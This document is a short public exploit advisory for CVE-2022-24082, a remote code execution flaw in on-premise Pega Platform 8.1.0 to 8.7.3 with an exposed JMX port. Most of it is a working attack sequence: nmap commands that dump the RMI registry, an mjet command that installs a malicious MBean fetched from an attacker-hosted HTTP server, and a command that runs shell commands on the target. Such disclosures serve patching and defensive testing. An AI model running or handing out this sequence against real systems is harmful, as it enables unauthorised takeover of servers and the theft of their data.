Pega Platform 8.7.3 Remote Code Execution

Pega Platform versions 8.1.0 through 8.7.3 suffer from a remote code execution vulnerability. If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly configured, then it may be possible to upload serialized payloads to attack the underlying system. This does not affect systems running on PegaCloud due to its design and architecture.


SHA-256 | 14f97e39b3b48a9075da1f6e66862a187e036b509ff25bfce33fb66bb645c604

# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution
# Google Dork: N/A
# Date: 20 Oct 2022
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
# Vendor Homepage: www.pega.com
# Software Link: Not Available
# Version: 8.1.0 on-premise and higher, up to 8.7.3
# Tested on: Red Hat Enterprise 7
# CVE : CVE-2022-24082

;Dumping RMI registry:
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>

;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1:<PORT>)
;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well):
nmap -sT -sV -p <PORT> <IP Address>

;Exploitation requires:
;- JVM
;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
;- jython
;Installing mbean for remote code execution
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666

;Execution of commands id & ifconfig
java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"

;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316


Related Posts